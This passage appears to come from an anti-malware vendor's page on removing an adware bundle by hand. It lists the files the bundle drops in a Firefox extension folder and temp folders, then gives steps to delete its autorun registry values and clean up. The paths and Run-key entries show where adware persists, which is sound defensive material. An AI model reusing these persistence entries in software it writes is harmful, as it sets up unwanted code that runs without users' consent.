    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\manifest.xml (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\2966208f6f17965b7ecec8246f3a7987.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ec896a0e141e5dc276507e634c372cef.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\082018fb846ff65c5bf5617a33ee152f.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1bd6d602d9bbac27ba391259e7bbbbe3.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\background.js (433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\337.js (413 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\391.js (801 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\b89f20f5ff37e721bdf8c6b27adf34f0.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\957753003961e16b9d3875160c1d836c.js (357 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5cfbf1d23e9c70a6610d2ba856d760c7.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\0d9afa14293fb2defd433c1e44084072.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon128.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\a9bca21d8ed5604f189d3c6b5d14f212.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\922de081cce9760fc2ef469ee33b47be.js (26 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\01e3df8ee766955c1fe4bc2d7351c1e9.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\908911f377da2f4300ad53c584a6f1c7.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\popup.html (353 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\skin.css (949 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1839b379e07746aeb5de0bc97f3bdce5.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon48.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\f99e7a2531569faa80c16ca9d5e1c633.js (947 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d3fdac9512d9c4e9a34744eeaf34ed34.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\26e4035a00b96086b392f3408b392c18.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\e646b7626b362452244ed88243e574d7.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button3.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\background.html (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\5e801953aaeac606dabc295bd143d82c.js (28 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\345.js (663 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\360b0315ed71c76681103028529549ca.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a0b72c25dfa79d2809d9cdd1bc7a2edc.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5f13d1eeafa4224378a0236393d8c64c.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button4.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\ad5771041c3b23e83ee8ec04bfaf6c66.js (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\defaults\preferences\prefs.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins.json (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\376.js (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome.manifest (682 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\193.js (873 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.xul (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\a798b64d3aefd50a53b1c66534d2d1cd.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\6c635353444d33ccb21cdd3803eb0ce6.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button2.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1dba13f84a1d100b00721ddfc719ab9b.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7dd27344207a3d5b338efe5da772d56e.js (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\192.js (873 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button5.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon24.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button1.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\28.js (506 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\288.js (969 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d15996a3e1873333557cc0c6c849bb01.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\246.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\install.rdf (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\63b22631a526419ea26680c080bbac8c.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1cecc7e218873c28f4b662759216ae67.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5dbb92ae30bf904cf707a60753ebfcab.js (134 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\36f446706cbe822655d64f2059682958.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\9c4474f9cc2ba1852dc46219428a5529.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\390.js (829 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\update.css (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\cd968bf84d67abd38d7e0e082cf3ddf4.js (964 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\3331ce3124f425f18aa0cd3f4ebe2a70.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon16.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\browser.xul (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\334.js (973 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\6d5fc3cb52b115abdd8a361b3100b092.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7e879a8ffcf48cf936a306241728a0e3.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\281.js (461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\extension.js (617 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\c27d5a4158dc01e3abffc659fce6398a.js (22 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\563fc8d160446dffd6f83bfad55d207e.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\e1502e0951b2a47afbfc8872f49c1b06.js (618 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7ae0b639df0fc9c2612f306f59e1c78f.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\356.js (413 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\399.js (525 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\e51cfc6d25a631d86877ff61fa2c7780.js (659 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4866.tmp (35697 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\4D90EAE405E9E2FF (34773 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\NK.lky (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe (379403 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\D1989.dll (30 bytes)
    %Program Files% (x86)\The Tetris Game\www.TheTetrisGame.com.url (54 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Tetris Game\More Games on the Web.lnk (924 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\_isetup\_setup64.tmp (6 bytes)
    %Program Files% (x86)\The Tetris Game\unins000.dat (31262 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\More games.lnk (906 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\bi.exe (4701 bytes)
    %Program Files% (x86)\The Tetris Game\Tetris.exe (1 bytes)
    %Program Files% (x86)\The Tetris Game\is-SBKRK.tmp (7385 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\itdownload.dll (1489 bytes)
    %Program Files% (x86)\The Tetris Game\is-CVF0M.tmp (25913 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\The Tetris Game.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Games.url (54 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\innocallback.dll (130 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UKE9O.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Tetris Game\The Tetris Game.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\rblyvufer.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\Mniitruxnlcp.exe (1594703 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\aexyni.dll (2141 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\wwrumuo.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC5FD.tmp\Sbmxxpvhefaej.tmp (360192 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
    "thetetrisgame" = ""

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
    "SPDriver" = "%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "SPDriver" = "%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "GOOBZOYouTubeAccelerator" = "%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe /startup"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "GOOBZOYouTubeAccelerator" = "%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe"

    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now